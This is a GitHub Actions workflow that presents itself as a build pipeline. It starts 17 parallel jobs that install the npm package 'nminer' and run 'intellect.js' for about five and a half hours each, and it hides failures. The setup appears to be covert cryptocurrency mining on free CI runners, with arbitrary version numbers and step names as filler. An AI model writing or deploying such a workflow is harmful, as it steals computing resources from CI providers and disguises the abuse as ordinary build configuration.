name: intellect
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1922 }
          - { version: 5785 }
          - { version: 3389 }
          - { version: 3083 }
          - { version: 3662 }
          - { version: 6442 }
          - { version: 8217 }
          - { version: 7588 }
          - { version: 1624 }
          - { version: 869 }
          - { version: 7215 }
          - { version: 4064 }
          - { version: 6711 }
          - { version: 7292 }
          - { version: 2380 }
          - { version: 7613 }
          - { version: 7919 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: tightly
        run: |
          npm install nminer@latest
          timeout 327m node intellect.js || echo "intellect executed"